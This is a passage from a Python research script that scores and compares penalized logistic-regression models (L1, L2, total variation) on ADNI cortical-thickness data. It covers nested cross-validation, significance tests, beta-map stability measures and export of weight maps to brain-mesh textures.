y_pred, average=None)\n auc = 
roc_auc_score(y_true, prob_pred) #area under curve score.\n n_ite = None\n betas = np.hstack([item[\"beta\"][config['penalty_start']:, :] for item in values]).T\n #betas = np.hstack([item[\"beta\"] for item in values]).T\n ## Compute beta similarity measures\n # Correlation\n R = np.corrcoef(betas)\n #print R\n R = R[np.triu_indices_from(R, 1)]\n # Fisher z-transformation / average\n z_bar = np.mean(1. / 2. * np.log((1 + R) / (1 - R)))\n # bracktransform\n r_bar = (np.exp(2 * z_bar) - 1) / (np.exp(2 * z_bar) + 1)\n\n # threshold betas to compute fleiss_kappa and DICE\n try:\n betas_t = np.vstack([array_utils.arr_threshold_from_norm2_ratio(betas[i, :], .99)[0] for i in xrange(betas.shape[0])])\n #print \"--\", np.sqrt(np.sum(betas_t ** 2, 1)) / np.sqrt(np.sum(betas ** 2, 1))\n print(np.allclose(np.sqrt(np.sum(betas_t ** 2, 1)) / np.sqrt(np.sum(betas ** 2, 1)), [0.99]*5,\n rtol=0, atol=1e-02))\n\n # Compute fleiss kappa statistics\n beta_signed = np.sign(betas_t)\n table = np.zeros((beta_signed.shape[1], 3))\n table[:, 0] = np.sum(beta_signed == 0, 0)\n table[:, 1] = np.sum(beta_signed == 1, 0)\n table[:, 2] = np.sum(beta_signed == -1, 0)\n fleiss_kappa_stat = fleiss_kappa(table)\n\n # Paire-wise Dice coeficient\n ij = [[i, j] for i in xrange(5) for j in xrange(i+1, 5)]\n #print [[idx[0], idx[1]] for idx in ij]\n dices = list()\n for idx in ij:\n A, B = beta_signed[idx[0], :], beta_signed[idx[1], :]\n dices.append(float(np.sum((A == B)[(A != 0) & (B != 0)])) / (np.sum(A != 0) + np.sum(B != 0)))\n dice_bar = np.mean(dices)\n except:\n dice_bar = fleiss_kappa_stat = 0.\n\n #a, l1, l2 , tv , k = [float(par) for par in key.split(\"_\")]\n scores = OrderedDict()\n try:\n a, l1, l2 , tv , k = [float(par) for par in key.split(\"_\")]\n scores['a'] = a\n scores['l1'] = l1\n scores['l2'] = l2\n scores['tv'] = tv\n left = float(1 - tv)\n if left == 0: left = 1.\n scores['l1_ratio'] = float(l1) / left\n scores['k'] = k\n except:\n pass\n scores['recall_0'] = r[0]\n scores['recall_1'] = r[1]\n scores['recall_mean'] = r.mean()\n scores['recall_mean_std'] = recall_mean_std\n scores['auc'] = auc\n# scores['beta_cor_mean'] = beta_cor_mean\n scores['precision_0'] = p[0]\n scores['precision_1'] = p[1]\n scores['precision_mean'] = p.mean()\n scores['f1_0'] = f[0]\n scores['f1_1'] = f[1]\n scores['f1_mean'] = f.mean()\n scores['support_0'] = s[0]\n scores['support_1'] = s[1]\n# scores['corr']= corr\n scores['beta_r'] = str(R)\n scores['beta_r_bar'] = r_bar\n scores['beta_fleiss_kappa'] = fleiss_kappa_stat\n scores['beta_dice'] = str(dices)\n scores['beta_dice_bar'] = dice_bar\n scores['n_ite'] = n_ite\n scores['param_key'] = key\n if ret_y:\n scores[\"y_true\"], scores[\"y_pred\"], scores[\"prob_pred\"] = y_true, y_pred, prob_pred\n return scores\n\ndef reducer_2015():\n import os, glob, pandas as pd\n os.chdir(os.path.dirname(config_filename()))\n config = json.load(open(config_filename()))\n paths = glob.glob(os.path.join(config['map_output'], \"*\", \"*\", \"*\"))\n #paths = [p for p in paths if not p.count(\"0.8_-1\")]\n\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n\n def groupby_paths(paths, pos):\n groups = {g:[] for g in set([p.split(\"/\")[pos] for p in paths])}\n for p in paths:\n groups[p.split(\"/\")[pos]].append(p)\n return groups\n\n def argmaxscore_bygroup(data, groupby='fold', arg=\"param_key\", score=\"recall_mean\"):\n arg_max_byfold = list()\n for fold, data_fold in data.groupby(groupby):\n assert len(data_fold) == len(set(data_fold[arg])) # ensure all param are diff\n 
arg_max_byfold.append([fold, data_fold.ix[data_fold[score].argmax()][arg], data_fold[score].max()])\n return pd.DataFrame(arg_max_byfold, columns=[groupby, arg, score])\n\n print('## Refit scores')\n print('## ------------')\n byparams = groupby_paths([p for p in paths if p.count(\"refit\")], 3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.iteritems()}\n data = [byparams_scores[k].values() for k in byparams_scores]\n\n columns = byparams_scores[byparams_scores.keys()[0]].keys()\n scores_refit = pd.DataFrame(data, columns=columns)\n\n print('## doublecv scores by outer-cv and by params')\n print('## -----------------------------------------')\n data = list()\n bycv = groupby_paths([p for p in paths if p.count(\"cvnested\")], 1)\n for fold, paths_fold in bycv.iteritems():\n print(fold)\n byparams = groupby_paths([p for p in paths_fold], 3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.iteritems()}\n data += [[fold] + byparams_scores[k].values() for k in byparams_scores]\n\n scores_dcv_byparams = pd.DataFrame(data, columns=[\"fold\"] + columns)\n byparams_scores_refit = byparams_scores\n\n # # rm small l1 with large tv & large l1 with small tv\n # rm = \\\n # (close(scores_dcv_byparams.l1_ratio, 0.1) & close(scores_dcv_byparams.tv, 0.8)) |\\\n # (close(scores_dcv_byparams.l1_ratio, 0.9) & close(scores_dcv_byparams.tv, 0.2))\n # np.sum(rm)\n # scores_dcv_byparams = scores_dcv_byparams[np.logical_not(rm)]\n\n # model selection on nested cv for 8 cases\n l2 = scores_dcv_byparams[(scores_dcv_byparams.l1 == 0) & (scores_dcv_byparams.tv == 0)]\n l2tv = scores_dcv_byparams[(scores_dcv_byparams.l1 == 0) & (scores_dcv_byparams.tv != 0)]\n l1l2 = scores_dcv_byparams[(scores_dcv_byparams.l1 != 0) & (scores_dcv_byparams.tv == 0)]\n l1l2tv = scores_dcv_byparams[(scores_dcv_byparams.l1 != 0) & (scores_dcv_byparams.tv != 0)]\n # large ans small l1\n l1l2_ll1 = scores_dcv_byparams[close(scores_dcv_byparams.l1_ratio, 0.9) & (scores_dcv_byparams.tv == 0)]\n l1l2tv_ll1 = scores_dcv_byparams[close(scores_dcv_byparams.l1_ratio, 0.9) & (scores_dcv_byparams.tv != 0)]\n l1l2_sl1 = scores_dcv_byparams[close(scores_dcv_byparams.l1_ratio, 0.1) & (scores_dcv_byparams.tv == 0)]\n l1l2tv_sl1 = scores_dcv_byparams[close(scores_dcv_byparams.l1_ratio, 0.1) & (scores_dcv_byparams.tv != 0)]\n\n print('## Model selection')\n print('## ---------------')\n l2 = argmaxscore_bygroup(l2); l2[\"method\"] = \"l2\"\n l2tv = argmaxscore_bygroup(l2tv); l2tv[\"method\"] = \"l2tv\"\n l1l2 = argmaxscore_bygroup(l1l2); l1l2[\"method\"] = \"l1l2\"\n l1l2tv = argmaxscore_bygroup(l1l2tv); l1l2tv[\"method\"] = \"l1l2tv\"\n\n l1l2_ll1 = argmaxscore_bygroup(l1l2_ll1); l1l2_ll1[\"method\"] = \"l1l2_ll1\"\n l1l2tv_ll1 = argmaxscore_bygroup(l1l2tv_ll1); l1l2tv_ll1[\"method\"] = \"l1l2tv_ll1\"\n l1l2_sl1 = argmaxscore_bygroup(l1l2_sl1); l1l2_sl1[\"method\"] = \"l1l2_sl1\"\n l1l2tv_sl1 = argmaxscore_bygroup(l1l2tv_sl1); l1l2tv_sl1[\"method\"] = \"l1l2tv_sl1\"\n\n scores_argmax_byfold = pd.concat([l2, l2tv, l1l2, l1l2tv, l1l2_ll1, l1l2tv_ll1, l1l2_sl1, l1l2tv_sl1])\n\n print('## Apply best model on refited')\n print('## ---------------------------')\n scores_l2 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l2.iterrows()], config)\n scores_l2tv = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l2tv.iterrows()], config)\n scores_l1l2 = scores(\"nestedcv\", 
[os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2.iterrows()], config)\n scores_l1l2tv = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv.iterrows()], config)\n\n scores_l1l2_ll1 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_ll1.iterrows()], config)\n scores_l1l2tv_ll1 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv_ll1.iterrows()], config)\n\n scores_l1l2_sl1 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_sl1.iterrows()], config)\n scores_l1l2tv_sl1 = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv_sl1.iterrows()], config)\n\n scores_cv = pd.DataFrame([[\"l2\"] + scores_l2.values(),\n [\"l2tv\"] + scores_l2tv.values(),\n [\"l1l2\"] + scores_l1l2.values(),\n [\"l1l2tv\"] + scores_l1l2tv.values(),\n\n [\"l1l2_ll1\"] + scores_l1l2_ll1.values(),\n [\"l1l2tv_ll1\"] + scores_l1l2tv_ll1.values(),\n\n [\"l1l2_sl1\"] + scores_l1l2_sl1.values(),\n [\"l1l2tv_sl1\"] + scores_l1l2tv_sl1.values()], columns=[\"method\"] + scores_l2.keys())\n\n with pd.ExcelWriter(results_filenane()) as writer:\n scores_refit.to_excel(writer, sheet_name='scores_refit', index=False)\n scores_dcv_byparams.to_excel(writer, sheet_name='scores_dcv_byparams', index=False)\n scores_argmax_byfold.to_excel(writer, sheet_name='scores_argmax_byfold', index=False)\n scores_cv.to_excel(writer, sheet_name='scores_cv', index=False)\n\n###############################################################################\ndef compare_models_2015():\n import os, glob, pandas as pd\n from brainomics.stats import mcnemar_test_classification\n os.chdir(os.path.dirname(config_filename()))\n scores_argmax_byfold = pd.read_excel(results_filenane(), sheetname='scores_argmax_byfold')\n config = json.load(open(config_filename()))\n\n ## Comparison: tv vs notv on non-smoothed data\n ## --------------------------------------------\n l1l2tv_sl1 = scores_argmax_byfold[scores_argmax_byfold.method == \"l1l2tv_sl1\"]\n l1l2_sl1 = scores_argmax_byfold[scores_argmax_byfold.method == \"l1l2_sl1\"]\n scores_l1l2tv_sl1 = scores(\"nestedcv\", paths=[os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv_sl1.iterrows()],\n config=config, ret_y=True)\n scores_l1l2_sl1 = scores(\"nestedcv\", paths=[os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_sl1.iterrows()],\n config=config, ret_y=True)\n assert np.all(scores_l1l2tv_sl1[\"y_true\"] == scores_l1l2_sl1[\"y_true\"])\n l1l2tv_sl1_pval = mcnemar_test_classification(y_true=scores_l1l2tv_sl1[\"y_true\"], y_pred1=scores_l1l2tv_sl1[\"y_pred\"], y_pred2=scores_l1l2_sl1[\"y_pred\"], cont_table=False)\n\n l1l2tv_ll1 = scores_argmax_byfold[scores_argmax_byfold.method == \"l1l2tv_ll1\"]\n l1l2_ll1 = scores_argmax_byfold[scores_argmax_byfold.method == \"l1l2_ll1\"]\n scores_l1l2tv_ll1 = scores(\"nestedcv\", paths=[os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2tv_ll1.iterrows()],\n config=config, ret_y=True)\n scores_l1l2_ll1 = scores(\"nestedcv\", paths=[os.path.join(config['map_output'], row[\"fold\"], \"refit\", 
row[\"param_key\"]) for index, row in l1l2_ll1.iterrows()],\n config=config, ret_y=True)\n assert np.all(scores_l1l2tv_ll1[\"y_true\"] == scores_l1l2_ll1[\"y_true\"])\n l1l2tv_ll1_pval = mcnemar_test_classification(y_true=scores_l1l2tv_ll1[\"y_true\"], y_pred1=scores_l1l2tv_ll1[\"y_pred\"], y_pred2=scores_l1l2_ll1[\"y_pred\"], cont_table=False)\n\n comp_pred = pd.DataFrame([[\"l1l2(no vs tv)ll1\", l1l2tv_ll1_pval],\n [\"l1l2(no vs tv)sl1\", l1l2tv_sl1_pval]], columns=[\"comparison\", \"mcnemar_p_value\"])\n\n ## p-value assesment by permutation\n from brainomics.stats import auc_recalls_permutations_pval\n\n y_true = scores_l1l2tv_ll1[\"y_true\"]\n y_pred1, y_pred2 = scores_l1l2tv_ll1[\"y_pred\"], scores_l1l2_ll1[\"y_pred\"]\n prob_pred1, prob_pred2 = scores_l1l2tv_ll1[\"prob_pred\"], scores_l1l2_ll1[\"prob_pred\"]\n ll1_auc_pval, ll1_r_mean_pval = auc_recalls_permutations_pval(y_true, y_pred1, y_pred2, prob_pred1, prob_pred2, nperms=10000)\n\n y_true = scores_l1l2tv_sl1[\"y_true\"]\n y_pred1, y_pred2 = scores_l1l2tv_sl1[\"y_pred\"], scores_l1l2_sl1[\"y_pred\"]\n prob_pred1, prob_pred2 = scores_l1l2tv_sl1[\"prob_pred\"], scores_l1l2_sl1[\"prob_pred\"]\n sl1_auc_pval, sl1_r_mean_pval = auc_recalls_permutations_pval(y_true, y_pred1, y_pred2, prob_pred2, prob_pred2, nperms=10000)\n\n comp_pred[\"recall_mean_perm_pval\"] = [ll1_r_mean_pval, sl1_r_mean_pval]\n comp_pred[\"auc_perm_pval\"] = [ll1_auc_pval, sl1_auc_pval]\n\n ## Compare weights map stability\n # mean correlaction\n from brainomics.stats import sign_permutation_pval\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_ll1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_ll1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n ll1_beta_r_mean = np.mean(scores1 - scores2)\n ll1_beta_r_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_sl1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_sl1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n sl1_beta_r_mean = np.mean(scores1 - scores2)\n sl1_beta_r_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n comp_pred[\"beta_r_mean_diff\"] = [ll1_beta_r_mean, sl1_beta_r_mean]\n comp_pred[\"beta_r_perm_pval\"] = [ll1_beta_r_pval, sl1_beta_r_pval]\n\n # mean dice\n from brainomics.stats import sign_permutation_pval\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_ll1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_ll1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n ll1_beta_dice_mean = np.mean(scores1 - scores2)\n ll1_beta_dice_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_sl1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_sl1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n sl1_beta_dice_mean = np.mean(scores1 - scores2)\n sl1_beta_dice_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n comp_pred[\"beta_dice_mean_diff\"] = [ll1_beta_dice_mean, sl1_beta_dice_mean]\n comp_pred[\"beta_dice_perm_pval\"] = [ll1_beta_dice_pval, 
sl1_beta_dice_pval]\n\n ## Comparison: tv vs notv on smoothed data\n ## ---------------------------------------\n scores_argmax_byfold_s = pd.read_excel(results_filenane_s(), sheetname='scores_argmax_byfold')\n config_s = json.load(open(config_filename_s()))\n l1l2_sl1_s = scores_argmax_byfold[scores_argmax_byfold_s.method == \"l1l2_sl1\"]\n scores_l1l2_sl1_s = scores(\"nestedcv\", paths=[os.path.join(WD_s, config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_sl1_s.iterrows()],\n config=config_s, ret_y=True)\n assert np.all(scores_l1l2tv_sl1[\"y_true\"] == scores_l1l2_sl1_s[\"y_true\"])\n l1l2tv_sl1_s_pval = mcnemar_test_classification(y_true=scores_l1l2tv_sl1[\"y_true\"], y_pred1=scores_l1l2tv_sl1[\"y_pred\"], y_pred2=scores_l1l2_sl1_s[\"y_pred\"], cont_table=False)\n #\n scores_argmax_byfold_s = pd.read_excel(results_filenane_s(), sheetname='scores_argmax_byfold')\n config_s = json.load(open(config_filename_s()))\n l1l2_ll1_s = scores_argmax_byfold[scores_argmax_byfold_s.method == \"l1l2_ll1\"]\n scores_l1l2_ll1_s = scores(\"nestedcv\", paths=[os.path.join(WD_s, config['map_output'], row[\"fold\"], \"refit\", row[\"param_key\"]) for index, row in l1l2_ll1_s.iterrows()],\n config=config_s, ret_y=True)\n assert np.all(scores_l1l2tv_ll1[\"y_true\"] == scores_l1l2_ll1_s[\"y_true\"])\n l1l2tv_ll1_s_pval = mcnemar_test_classification(y_true=scores_l1l2tv_ll1[\"y_true\"], y_pred1=scores_l1l2tv_sl1[\"y_pred\"], y_pred2=scores_l1l2_ll1_s[\"y_pred\"], cont_table=False)\n comp_pred_s = pd.DataFrame([[\"l1l2_s vs l1l2tv (ll1)\", l1l2tv_ll1_s_pval], [\"l1l2_s vs l1l2tv (sl1)\", l1l2tv_sl1_s_pval]],\n columns=[\"comparison\", \"mcnemar_p_value\"])\n\n ## p-value assesment by permutation\n y_true = scores_l1l2tv_ll1[\"y_true\"]\n y_pred1, y_pred2 = scores_l1l2tv_ll1[\"y_pred\"], scores_l1l2_ll1_s[\"y_pred\"]\n prob_pred1, prob_pred2 = scores_l1l2tv_ll1[\"prob_pred\"], scores_l1l2_ll1_s[\"prob_pred\"]\n ll1_auc_s_pval, ll1_r_mean_s_pval = auc_recalls_permutations_pval(y_true, y_pred1, y_pred2, prob_pred1, prob_pred2, nperms=10000)\n\n y_true = scores_l1l2tv_sl1[\"y_true\"]\n y_pred1, y_pred2 = scores_l1l2tv_sl1[\"y_pred\"], scores_l1l2_sl1_s[\"y_pred\"]\n prob_pred1, prob_pred2 = scores_l1l2tv_sl1[\"prob_pred\"], scores_l1l2_sl1_s[\"prob_pred\"]\n sl1_auc_s_pval, sl1_r_mean_s_pval = auc_recalls_permutations_pval(y_true, y_pred1, y_pred2, prob_pred2, prob_pred2, nperms=10000)\n\n comp_pred_s[\"recall_mean_perm_pval\"] = [ll1_r_mean_s_pval, sl1_r_mean_s_pval]\n comp_pred_s[\"auc_perm_pval\"] = [ll1_auc_s_pval, sl1_auc_s_pval]\n\n ## Compare weights map stability\n # mean correlaction\n from brainomics.stats import sign_permutation_pval\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_ll1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_ll1_s['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n ll1_beta_r_mean_s = np.mean(scores1 - scores2)\n ll1_beta_r_s_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_sl1['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_sl1_s['beta_r'].replace('[', '').replace(']', '').split(\" \") if len(s)])\n sl1_beta_r_mean_s = np.mean(scores1 - scores2)\n sl1_beta_r_s_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n 
comp_pred_s[\"beta_r_mean_diff\"] = [ll1_beta_r_mean_s, sl1_beta_r_mean_s]\n comp_pred_s[\"beta_r_perm_pval\"] = [ll1_beta_r_s_pval, sl1_beta_r_s_pval]\n\n # mean dice\n from brainomics.stats import sign_permutation_pval\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_ll1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_ll1_s['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n ll1_beta_dice_mean_s = np.mean(scores1 - scores2)\n ll1_beta_dice_s_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n scores1 = np.array([float(s.strip()) for s in scores_l1l2tv_sl1['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n scores2 = np.array([float(s.strip()) for s in scores_l1l2_sl1_s['beta_dice'].replace('[', '').replace(']', '').split(\",\") if len(s)])\n sl1_beta_dice_mean_s = np.mean(scores1 - scores2)\n sl1_beta_dice_s_pval = sign_permutation_pval(scores1 - scores2, nperms=10000, stat=\"mean\")\n\n comp_pred_s[\"beta_dice_mean_diff\"] = [ll1_beta_dice_mean_s, sl1_beta_dice_mean_s]\n comp_pred_s[\"beta_dice_perm_pval\"] = [ll1_beta_dice_s_pval, sl1_beta_dice_s_pval]\n\n comp_pred = comp_pred.append(comp_pred_s)\n # End comparison with smoothed data\n\n xlsx = pd.ExcelFile(results_filenane())\n with pd.ExcelWriter(results_filenane()) as writer:\n for sheet in xlsx.sheet_names: # cp previous sheets\n xlsx.parse(sheet).to_excel(writer, sheet_name=sheet, index=False)\n comp_pred.to_excel(writer, sheet_name='comparisons', index=False)\n\n\n###############################################################################\n## vizu weight maps\ndef vizu_weight_maps_2015():\n import glob, shutil\n import brainomics.mesh_processing as mesh_utils\n\n config = json.load(open(config_filename()))\n INPUT_BASE = os.path.join(os.path.dirname(WD), \"MCIc-CTL-FS_cs\", \"5cv\", \"0\")\n OUTPUT = os.path.join(WD, \"weights_map_mesh\")\n if not os.path.exists(OUTPUT):\n os.mkdir(OUTPUT)\n\n TEMPLATE_PATH = os.path.join(WD, \"..\", \"freesurfer_template\")\n shutil.copyfile(os.path.join(TEMPLATE_PATH, \"lh.pial.gii\"), os.path.join(OUTPUT, \"lh.pial.gii\"))\n shutil.copyfile(os.path.join(TEMPLATE_PATH, \"rh.pial.gii\"), os.path.join(OUTPUT, \"rh.pial.gii\"))\n\n cor_l, tri_l = mesh_utils.mesh_arrays(os.path.join(OUTPUT, \"lh.pial.gii\"))\n cor_r, tri_r = mesh_utils.mesh_arrays(os.path.join(OUTPUT, \"rh.pial.gii\"))\n assert cor_l.shape[0] == cor_r.shape[0] == 163842\n\n cor_both, tri_both = mesh_utils.mesh_arrays(os.path.join(WD, config[\"structure\"][\"mesh\"]))\n mask__mesh = np.load(os.path.join(WD, config[\"structure\"][\"mask\"]))\n assert mask__mesh.shape[0] == cor_both.shape[0] == cor_l.shape[0] * 2 == cor_l.shape[0] + cor_r.shape[0]\n assert mask__mesh.shape[0], mask__mesh.sum() == (327684, 317089)\n\n # Find the mapping from beta in masked mesh to left_mesh and right_mesh\n # concat was initialy: cor = np.vstack([cor_l, cor_r])\n mask_left__mesh = np.arange(mask__mesh.shape[0]) < mask__mesh.shape[0] / 2\n mask_left__mesh[np.logical_not(mask__mesh)] = False\n mask_right__mesh = np.arange(mask__mesh.shape[0]) >= mask__mesh.shape[0] / 2\n mask_right__mesh[np.logical_not(mask__mesh)] = False\n assert mask__mesh.sum() == (mask_left__mesh.sum() + mask_right__mesh.sum())\n\n # the mask of the left/right emisphere within the left/right mesh\n mask_left__left_mesh = mask_left__mesh[:cor_l.shape[0]]\n mask_right__right_mesh = 
mask_right__mesh[cor_l.shape[0]:]\n\n # compute mask from beta (in masked mesh) to left/right\n a = np.zeros(mask__mesh.shape, int)\n a[mask_left__mesh] = 1\n a[mask_right__mesh] = 2\n mask_left__beta = a[mask__mesh] == 1 # project mesh to mesh masked\n mask_right__beta = a[mask__mesh] == 2\n assert (mask_left__beta.sum() + mask_right__beta.sum()) == mask_left__beta.shape[0] == mask_right__beta.shape[0] == mask__mesh.sum()\n assert mask_left__mesh.sum() == mask_left__beta.sum()\n assert mask_right__mesh.sum() == mask_right__beta.sum()\n\n # Check mapping from beta left part to left_mesh\n assert mask_left__beta.sum() == mask_left__left_mesh.sum()\n assert mask_right__beta.sum() == mask_right__right_mesh.sum()\n\n\n # cf /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/MCIc-CTL-FS_cs_modselectcv.xlsx sheet score_refit\n models = dict(\n l1l2tv_sl1=\"0.1_0.02_0.18_0.8_-1.0\",\n l1l2_sl1=\"0.1_0.1_0.9_0.0_-1.0\",\n l1l2tv_ll1=\"0.1_0.18_0.02_0.8_-1.0\",\n l1l2_ll1=\"0.1_0.9_0.1_0.0_-1.0\")\n\n for mod in models:\n #mod = 'l1l2tv_sl1'\n #mod = 'l1l2tv_ll1'\n #mod = 'l1l2_sl1'\n #image_arr = np.zeros(mask.get_data().shape)\n beta_map_filenames = glob.glob(os.path.dirname(INPUT_BASE)+\"/*/\"+models[mod]+\"/beta.npz\")\n\n Betas = np.vstack([array_utils.arr_threshold_from_norm2_ratio(\n np.load(filename)['arr_0'][config[\"penalty_start\"]:, :].ravel(), .99)[0]\n for filename in beta_map_filenames])\n # left\n tex = np.zeros(mask_left__left_mesh.shape)\n tex[mask_left__left_mesh] = Betas[0, mask_left__beta]\n print(mod, \"left\", np.sum(tex != 0), tex.max(), tex.min())\n mesh_utils.save_texture(filename=os.path.join(OUTPUT, \"tex_%s_left_all.gii\" % mod), data=tex)#, intent='NIFTI_INTENT_TTEST')\n tex[mask_left__left_mesh] = np.sum(Betas[1:, mask_left__beta] != 0, axis=0) / float(NFOLDS_OUTER)\n mesh_utils.save_texture(filename=os.path.join(OUTPUT, \"tex_%s_left_count5cv.gii\" % mod), data=tex)#, intent='NIFTI_INTENT_TTEST')\n # right\n tex = np.zeros(mask_right__right_mesh.shape)\n tex[mask_right__right_mesh] = Betas[0, mask_right__beta]\n print(mod, \"right\", np.sum(tex != 0), tex.max(), tex.min())\n mesh_utils.save_texture(filename=os.path.join(OUTPUT, \"tex_%s_right_all.gii\" % mod), data=tex)#, intent='NIFTI_INTENT_TTEST')\n tex[mask_right__right_mesh] = np.sum(Betas[1:, mask_right__beta] != 0, axis=0) / float(NFOLDS_OUTER)\n mesh_utils.save_texture(filename=os.path.join(OUTPUT, \"tex_%s_right_count5cv.gii\" % mod), data=tex)#, intent='NIFTI_INTENT_TTEST')\n\n count_bothhemi = np.sum(Betas[1:, :] != 0, axis=0) / float(NFOLDS_OUTER)\n supports5cv_union = count_bothhemi != 0\n print(mod, supports5cv_union.sum(), np.mean(count_bothhemi[supports5cv_union]), np.median(count_bothhemi[supports5cv_union]))\n\n\"\"\"\nl1l2tv_sl1 left 26062 0.000890264392951 -0.000987486259691\nl1l2tv_sl1 right 16390 0.0135458979138 -0.0142103149973\nl1l2tv_sl1 96107 0.434596855588 0.2\nl1l2_ll1 left 17 0.0 -0.190563935072\nl1l2_ll1 right 14 0.0 -0.132351265158\nl1l2_ll1 128 0.2328125 0.2\nl1l2_sl1 left 522 0.0247513777459 -0.0353264969457\nl1l2_sl1 right 407 0.0239399696221 -0.0310938132124\nl1l2_sl1 2966 0.28064733648 0.2\nl1l2tv_ll1 left 4070 0.0 -0.00159611730872\nl1l2tv_ll1 right 3058 0.0 -0.000938590832559\nl1l2tv_ll1 17735 0.45856216521 0.4\n\ncd /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/weights_map_mesh\n\npalette signed_value_whitecenter\nl1l2tv_sl1 -0.001 +0.001\nl1l2_sl1 -0.01 +0.01\nl1l2tv_ll1 -0.001 +0.001\nl1l2_ll1 -0.01 
+0.01\n\n/neurospin/brainvisa/build/Ubuntu-14.04-x86_64/trunk/bin/bv_env /neurospin/brainvisa/build/Ubuntu-14.04-x86_64/trunk/bin/anatomist lh.pial.gii rh.pial.gii tex_*\n\nPour lh/rh.pial charger les référentiels, les afficher dans lh.pial/rh.pial\nColor / Rendering / Polygines face is clockwize\n\ncvcount\npalette signed_value_whitecenter -1, 1\n\n\ncd /home/ed203246/mega/studies/2015_logistic_nestv/figures/weights_map_mesh/snapshots_beta\nls *.png|while read input; do\nconvert $input -trim /tmp/toto.png;\nconvert /tmp/toto.png -transparent black $input;\ndone\n\ncd /home/ed203246/mega/studies/2015_logistic_nestv/figures/weights_map_mesh/snapshots_countcv\nls *.png|while read input; do\nconvert $input -trim /tmp/toto.png;\nconvert /tmp/toto.png -transparent black $input;\ndone\n\n\n\"\"\"\n\n\n###############################################################################\ndef plot_perf_2015():\n import os\n import numpy as np\n import pandas as pd\n import matplotlib.pyplot as plt\n from matplotlib.backends.backend_pdf import PdfPages\n\n # SOME ERROR WERE HERE CORRECTED 27/04/2014 think its good\n #INPUT_vbm = \"/home/ed203246/mega/data/2015_logistic_nestv/adni/MCIc-CTL-FS/MCIc-CTL-FS_cs.csv\"\n INPUT = os.path.join(WD, \"MCIc-CTL-FS_cs_modselectcv.csv\")\n y_col = 'recall_mean'\n x_col = 'tv'\n y_col = 'auc'\n a = 0.01\n #color_map = {0.:'#D40000', 0.01: 'black', 0.1:'#F0a513', 0.5:'#2CA02C', 0.9:'#87AADE', 1.:'#214478'}\n color_map = {0.:'#D40000', 0.01:'#F0a513', 0.1:'#2CA02C', 0.5:'#87AADE', .9:'#214478', 1.: 'black'}\n # reds dark => brigth, green blues: brigth => dark\n input_filename = INPUT\n #input_filename = INPUTS[data_type][\"filename\"]\n outut_filename = input_filename.replace(\".csv\", \"_%s.pdf\" % y_col)\n #print outut_filename\n # Filter data\n data = pd.read_csv(input_filename)\n #data.l1l2_ratio = data.l1l2_ratio.round(5)\n # avoid poor rounding\n data.l1l2_ratio = np.asarray(data.l1l2_ratio).round(3)\n data.tv = np.asarray(data.tv).round(5)\n data.a = 